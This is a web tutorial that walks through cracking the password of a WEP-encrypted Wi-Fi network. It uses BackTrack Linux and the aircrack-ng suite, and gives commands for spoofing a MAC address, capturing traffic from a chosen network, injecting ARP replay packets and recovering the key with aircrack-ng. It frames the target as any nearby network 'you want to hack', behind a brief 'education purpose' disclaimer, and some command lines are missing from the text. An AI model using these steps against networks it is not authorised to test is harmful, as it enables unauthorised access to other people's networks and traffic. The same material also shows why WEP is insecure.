In this tutorial we will go through the steps to hack the password on an WEP encrypted network. This is an fast and easy hack. So what does that mean to you?
That means security is low with WEP. So you should avoid using that on your wireless network. Also knows as WiFi. This tutorial is for education purpose. We cannot be held responsible for any thing you do with this.
The things you need is:
– A Computer
– WiFi Card
– DVD or Bootable USB Stick with BackTrack 4 R2.
You can download BackTrack from here:
This is an Linux distribution dedicated for security and penetration testing. When you have it downloaded you can burn it to an DVD. After that you just boot your computer with it. Be sure to set first boot in bios to DVD. Select the first option. Or Load in to Computer Memory (Ram) which is faster.
Now when you are booted up there will be a lot of text and it will stop. When it stops and you must type the following:
Wait until it stops and you can type again. Now type:
This will start the GUI so you can use your mouse and have an graphical look.
Open Terminal which is the black box in the left.
First run the command to list your network interfaces:
If you have one wireless and one cabled network card it will normally say:
Eth0 and wlan0. Or Eth0 and Eth1
Now we are going to change our MAC Address.
airmon-ng stop (interface)
ifconfig (interface) down
macchanger –mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
If the result is
Current MAC: xxxxx.x.x.xxx
Faked MAC: 00:11:22:33:44:55
Then you are successful.
Now it’s time to find the networks.
All the networks near you will be shown in an list. When you see the network you want to hack stop the scan by pressing CTRL+C.
Open a new Terminal window. Copy the BSSID and remember the channel. Be sure to not close the other windows because you need the info later.
The next thing is to gather packets from the network. This is used to crack the password.
airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)
Put in the channel of the network and the BSSID. Filename can be anything but to keep it organized use something that is similar or same as the name of the network.
Open a new Terminal again.
This time we are going to fake an Authentication with the router. So the router thinks we have the password and are good to go. This will lead to an much more effective packet gathering.
Next thing is to send traffic to the router. Type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
Be sure to type in the faked MAC address. This might make the network you are trying to hack unstable. But it will boost your packets amount extremely. If you don´t want to do this it might take a lot more time but more safe.
Now we need to look at the Terminal with the packet capture and if the Data amount is over 10 000 you might be successful in cracking it. If so type:
aircrack-ng -b (bssid) (file name-01.cap)
You might be able to crack it at 5000 data packets or even 50 000. It depends on what packets you gather and how strong the password on the network is.
If is the key is “xx:xx:xx:xx:xx” which it is often then you need to remove the : from it.
It should look like“xxxxxxxxxx”.
It don’t work what to do?
Well often it is just related to how far you are from the wireless router. If you open WICD Network manager in BackTrack you can see how many percent of network strength you get. If it is under 30% it often don’t works. So then you need to get a better signal.
It also might be your Internet Card that don’t support this type of hacking. Then you could buy an USB Wireless adapter such as Alfa. They can be bought at Amazon.